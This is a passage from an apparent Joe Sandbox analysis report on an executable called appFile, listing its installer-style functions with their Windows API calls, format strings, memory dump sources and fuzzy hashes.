                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                        • String ID: F
                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                        Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                        Strings
                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                        Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                        Strings
                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                        Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                        Strings
                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                        • String ID: f
                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                        • MulDiv.KERNEL32(0002C400,00000064,0241E552), ref: 00403295
                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                        Strings
                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
